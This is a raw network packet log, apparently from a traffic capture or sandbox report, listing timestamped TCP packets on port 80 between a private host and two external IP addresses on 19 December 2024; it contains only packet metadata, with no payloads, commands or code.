                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:25.342197895 CET4973580192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:25.342855930 CET804973531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:25.342873096 CET804973531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:25.342905998 CET4973580192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:25.342922926 CET4973580192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:25.343750954 CET804973531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:25.343766928 CET804973531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:25.343811035 CET4973580192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:25.352602005 CET804973531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:25.352679014 CET4973580192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:25.353323936 CET804973531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:25.353368998 CET4973580192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:25.353372097 CET804973531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:25.353406906 CET4973580192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:25.379280090 CET8049737185.215.113.206192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:25.379384995 CET4973780192.168.2.4185.215.113.206
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:25.389425039 CET4973780192.168.2.4185.215.113.206
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:25.443726063 CET804973531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:25.443803072 CET4973580192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:25.443892956 CET804973531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:25.443984032 CET4973580192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:25.444132090 CET804973531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:25.444178104 CET4973580192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:25.444638014 CET804973531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:25.444693089 CET4973580192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:25.444937944 CET804973531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:25.444987059 CET4973580192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:25.445353031 CET804973531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:25.445405006 CET4973580192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:25.446917057 CET804973531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:25.446933031 CET804973531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:25.446980953 CET4973580192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:25.447572947 CET804973531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:25.447590113 CET804973531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:25.447623968 CET4973580192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:25.447647095 CET4973580192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:25.449281931 CET804973531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:25.449306965 CET804973531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:25.449335098 CET4973580192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:25.449353933 CET4973580192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:25.451231956 CET804973531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:25.451248884 CET804973531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:25.451280117 CET4973580192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:25.451297998 CET4973580192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:25.452773094 CET804973531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:25.452821016 CET804973531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:25.452826977 CET4973580192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:25.452866077 CET4973580192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:25.456845999 CET804973531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:25.456864119 CET804973531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:25.456896067 CET4973580192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:25.456911087 CET4973580192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:25.459641933 CET804973531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:25.459696054 CET4973580192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:25.460352898 CET804973531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:25.460433960 CET4973580192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:25.461752892 CET804973531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:25.461770058 CET804973531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:25.461796999 CET4973580192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:25.461817980 CET4973580192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:25.464194059 CET804973531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:25.464243889 CET4973580192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:25.464706898 CET804973531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:25.464757919 CET4973580192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:25.467408895 CET804973531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:25.467459917 CET804973531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:25.467520952 CET4973580192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:25.470753908 CET804973531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:25.470813036 CET4973580192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:25.471062899 CET804973531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:25.471100092 CET804973531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:25.471155882 CET4973580192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:25.471908092 CET804973531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:25.471963882 CET4973580192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:25.474761009 CET804973531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:25.474816084 CET804973531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:25.474827051 CET4973580192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:25.474881887 CET4973580192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:25.476260900 CET804973531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:25.476316929 CET804973531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:25.476386070 CET4973580192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:25.477655888 CET804973531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:25.477691889 CET804973531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:25.477718115 CET4973580192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:25.477739096 CET4973580192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:25.478388071 CET804973531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:25.478446007 CET4973580192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:25.479140043 CET804973531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:25.479192972 CET4973580192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:25.479998112 CET804973531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:25.480051994 CET4973580192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:25.480756044 CET804973531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:25.480792046 CET804973531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:25.480812073 CET4973580192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:25.480827093 CET804973531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:25.480845928 CET4973580192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:25.480909109 CET4973580192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:25.482321978 CET804973531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:25.482357979 CET804973531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:25.482372999 CET4973580192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:25.482403994 CET4973580192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:25.483952045 CET804973531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:25.483988047 CET804973531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:25.484002113 CET4973580192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:25.484035015 CET4973580192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:25.484694958 CET804973531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:25.484747887 CET4973580192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:25.485389948 CET804973531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:25.485461950 CET4973580192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:25.486198902 CET804973531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:25.486251116 CET4973580192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:25.487086058 CET804973531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:25.487140894 CET4973580192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:25.488142967 CET804973531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:25.488178015 CET804973531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:25.488197088 CET4973580192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:25.488212109 CET804973531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:25.488224983 CET4973580192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:25.488261938 CET4973580192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:25.488817930 CET804973531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:25.488886118 CET4973580192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:25.489512920 CET804973531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:25.489579916 CET4973580192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:25.490175962 CET804973531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:25.490278959 CET4973580192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:25.490820885 CET804973531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:25.490855932 CET804973531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:25.490905046 CET4973580192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:25.492248058 CET804973531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:25.492285013 CET804973531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:25.492341042 CET4973580192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:25.493705988 CET804973531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:25.493741035 CET804973531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:25.493768930 CET4973580192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:25.493798018 CET4973580192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:25.494482040 CET804973531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:25.494544029 CET4973580192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:25.495326042 CET804973531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:25.495382071 CET4973580192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:25.495382071 CET804973531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:25.495440960 CET4973580192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:25.496145964 CET804973531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:25.496202946 CET4973580192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:25.497005939 CET804973531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:25.497061014 CET4973580192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:25.497628927 CET804973531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:25.497687101 CET4973580192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:25.498557091 CET804973531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:25.498593092 CET804973531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:25.498617887 CET4973580192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:25.498629093 CET4973580192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:25.500332117 CET804973531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:25.500385046 CET804973531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:25.500392914 CET4973580192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:25.500435114 CET4973580192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:25.501871109 CET804973531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:25.501905918 CET804973531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:25.501935959 CET4973580192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:25.501954079 CET4973580192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:25.502616882 CET804973531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:25.502676964 CET4973580192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:25.503302097 CET804973531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:25.503369093 CET4973580192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:25.503385067 CET804973531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:25.503436089 CET4973580192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:25.503948927 CET804973531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:25.504003048 CET4973580192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:25.505028009 CET804973531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:25.505064011 CET804973531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:25.505086899 CET4973580192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:25.505109072 CET4973580192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:25.505846024 CET804973531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:25.505918026 CET4973580192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:25.506694078 CET804973531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:25.507258892 CET4973580192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:25.507424116 CET804973531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:25.507474899 CET4973580192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:25.508085966 CET804973531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:25.508158922 CET4973580192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:25.509078979 CET804973531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:25.509114981 CET804973531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:25.509174109 CET4973580192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:25.510524035 CET804973531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:25.510559082 CET804973531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:25.510580063 CET4973580192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:25.510606050 CET4973580192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:25.511161089 CET804973531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:25.511214018 CET4973580192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:25.511879921 CET804973531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:25.511935949 CET4973580192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:25.512530088 CET804973531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:25.512566090 CET804973531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:25.512583017 CET4973580192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:25.512613058 CET4973580192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:25.513973951 CET804973531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:25.514007092 CET804973531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:25.514062881 CET4973580192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:25.515192032 CET804973531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:25.515228033 CET804973531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:25.515248060 CET4973580192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:25.515275002 CET4973580192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:25.515999079 CET804973531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:25.516035080 CET804973531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:25.516088009 CET4973580192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:25.516774893 CET804973531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:25.516843081 CET4973580192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:25.517368078 CET804973531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:25.517417908 CET4973580192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:25.518197060 CET804973531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:25.518256903 CET4973580192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:25.518847942 CET804973531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:25.519035101 CET4973580192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:25.521975040 CET804973531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:25.522011042 CET804973531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:25.522042036 CET4973580192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:25.522078037 CET4973580192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:25.523572922 CET804973531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:25.523633003 CET4973580192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:25.524229050 CET804973531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:25.524286985 CET4973580192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:25.525722027 CET804973531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:25.525782108 CET4973580192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:25.536322117 CET8049737185.215.113.206192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:25.638268948 CET804973531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:25.638334036 CET804973531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:25.638338089 CET4973580192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:25.638365030 CET804973531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:25.638391018 CET4973580192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:25.638415098 CET4973580192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:25.638647079 CET804973531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:25.638701916 CET4973580192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:25.639157057 CET804973531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:25.639264107 CET804973531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:25.639317036 CET4973580192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:25.639981985 CET804973531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:25.639998913 CET804973531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:25.640054941 CET4973580192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:25.640054941 CET4973580192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:25.641015053 CET804973531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:25.641031027 CET804973531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:25.641086102 CET4973580192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:25.641783953 CET804973531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:25.641908884 CET4973580192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:25.642537117 CET804973531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:25.642581940 CET4973580192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:25.643531084 CET804973531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:25.643546104 CET804973531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:25.643590927 CET4973580192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:25.644022942 CET804973531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:25.644038916 CET804973531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:25.644099951 CET4973580192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:25.644987106 CET804973531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:25.645003080 CET804973531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:25.645051956 CET4973580192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:25.648411989 CET804973531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:25.648490906 CET4973580192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:25.649118900 CET804973531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:25.649175882 CET4973580192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:25.650063992 CET804973531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:25.650082111 CET804973531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:25.650122881 CET4973580192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:25.650135994 CET4973580192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:25.652019978 CET804973531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:25.652076006 CET4973580192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:25.652792931 CET804973531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:25.652861118 CET4973580192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:25.655627012 CET804973531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:25.655643940 CET804973531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:25.655695915 CET4973580192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:25.655706882 CET4973580192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:25.656392097 CET804973531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:25.656455040 CET4973580192.168.2.431.41.244.11
